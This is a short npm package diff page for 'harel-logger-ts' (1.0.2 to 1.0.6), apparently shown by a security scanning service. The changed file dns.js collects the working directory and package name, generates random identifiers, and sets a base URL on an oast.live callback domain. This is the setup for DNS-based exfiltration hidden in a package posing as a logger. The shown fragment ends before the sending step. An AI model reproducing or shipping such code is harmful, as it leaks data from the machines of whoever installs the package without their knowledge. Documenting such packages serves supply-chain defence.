harel-logger-ts 1.0.2 → 1.0.6
Sign up to get free protection for your applications and to get access to all the features.
- package/dns.js +1 -1
- package/package.json +1 -1
package/dns.js
CHANGED
@@ -2,7 +2,7 @@ var os = require("os");
|
|
2
2
|
const dns = require('dns');
|
3
3
|
|
4
4
|
const characters ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
|
5
|
-
const baseurl = ".
|
5
|
+
const baseurl = ".cdqvfm9bn6qs73c7o4bg4bseqfys5fuzd.oast.live"
|
6
6
|
const id = generateString(3) + "."
|
7
7
|
const npmpkg = "harel-logger-ts"
|
8
8
|
const path = process.cwd().toString();
|